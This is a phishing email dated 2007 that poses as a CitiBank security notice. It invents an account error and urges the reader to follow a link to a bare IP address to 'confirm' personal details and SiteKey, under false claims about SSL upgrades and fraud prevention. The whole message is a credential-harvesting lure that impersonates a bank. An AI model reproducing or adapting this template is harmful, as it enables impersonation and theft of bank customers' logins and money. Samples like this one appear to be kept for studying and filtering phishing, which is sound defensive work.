Subject: Security update

From: "CitiBank"<[email-masked]>
Date: Sun, 23 Sep 2007 21:05:09 +0700

Dear CitiBank Customer,

During our regularly scheduled account maintenance and verification procedures,
we have detected a slight error in your account information.
To securely confirm your personal information please click on the link bellow:

http://64.129.116.154/~jeff/CitiBank/onlinebanking/step1.htm

Confirm Your CitiBank Account and SiteKey now to enjoy the benefits of
online banking and finance to avoid identity theft and fraudulent activities on
your account.

Note: We will be upgrading our yearly SSL EncryptedServer to prevent fraudulent
activity.

? 2007 CitiBank Inc. All rights reserved. ###########################################

This message has been scanned by F-Secure Anti-Virus for Microsoft Exchange.
For more information, connect to http://www.f-secure.com/